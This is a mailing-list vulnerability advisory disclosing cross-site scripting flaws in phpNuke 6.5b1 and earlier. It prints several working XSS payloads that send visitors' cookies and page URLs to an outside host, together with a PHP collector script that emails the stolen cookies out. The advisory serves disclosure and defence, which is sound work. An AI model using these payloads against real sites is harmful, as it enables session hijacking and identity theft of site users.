[<prev] [next>] [day] [month] [year] [list]
Message-ID: <003401c293e4$92bece80$e62d1c41@kc.rr.com>
From: mattmurphy at kc.rr.com (Matthew Murphy)
Subject: Multiple phpNuke Modules Vulnerable to Cross-Site Scripting
phpNuke Module Vulnerabilities Enable Identity Theft
Systems Affected: phpNuke 6.5b1 and prior (all operating systems)
Risk: High
Impact: Identity Theft/Impersonation/Privilege Elevation
Scenario: Cross-site scripting flaws enabling cookie theft
Description
phpNuke is a popular, and very complex content manager that runs on Unix,
Mac, and Windows systems with a MySQL or similar backend database. Many of
the content manager's modules contain serious vulnerabilities that allow
attackers to hijack or disable user accounts, and possibly gain
administrative privileges. Gaining such privileges could likely assist
further compromise of the susceptible system.
I. Search Module Vulnerability
The search module of phpNuke applies absolutely no filtering at all when
returning the "Results for x..." page, and as a result is susceptible to
cross-site scripting via a simple query such as:
<SCRIPT>location.href="http://www.techie.hopto.org/fetch.php?email=mattmurph
y@...rr.com&ref="+document.URL+"cookie="+document.cookie;</SCRIPT>
II. Multiple Module Extended Tag Vulnerabilities
phpNuke does a decent job of stripping known malicious tags, but doesn't
take into account the fact that even "safe" tags can have malicious
properties. This enables cross-site scripting against the PM module,
Discussion module, News module, etc. so basically any module that accepts
user input for an article, message, or comment, can be attacked with HTML
such as:
<B
STYLE="left:expression(eval('location.href=\'http://www.techie.hopto.org/fet
ch.php?email=mattmurphy@...rr.com&ref=\'+document.URL+\'cookie=\'+document.c
ookie'))">Bold text -- or an attack?</B>
<B
ONCLICK="location.href='http://www.techie.hopto.org/fetch.php?email=mattmurp
hy@...rr.com&ref='+document.URL+'cookie='+document.cookie">Don't Click</B>
<B
ONMOUSEOVER="location.href='http://www.techie.hopto.org/fetch.php?email=matt
murphy@...rr.com&ref='+document.URL+'cookie='+document.cookie">Keep
Away!</B>
III. Exploit Script
<?php
error_reporting(0);
$redir_ref = TRUE;
mail($_GET["email"], "phpNuke Cookie", $_GET["cookie"]);
if ($redir_ref) {
header("Location: ".urlencode($_GET["ref"]));
}
?>
Vendor Response
I've contacted www.phpnuke.org through a private message, but if anyone
knows a more reliable contact for them, please do use it, as this is not
likely the only route of contact. I sent a PM to "nukelite" with an example
exploit in it. I expect that future BETA releases will eliminate this
vulnerability. I am submitting this to the list so that vulnerable
administrators may make the necessary revisions to prevent this
vulnerability. The versions available for download on www.phpnuke.org as
well as the version deployed there, remains vulnerable at the time of this
writing.
Powered by blists - more mailing lists